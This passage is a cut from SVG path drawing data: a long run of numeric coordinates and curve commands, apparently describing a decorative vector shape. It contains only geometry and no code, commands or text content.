1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5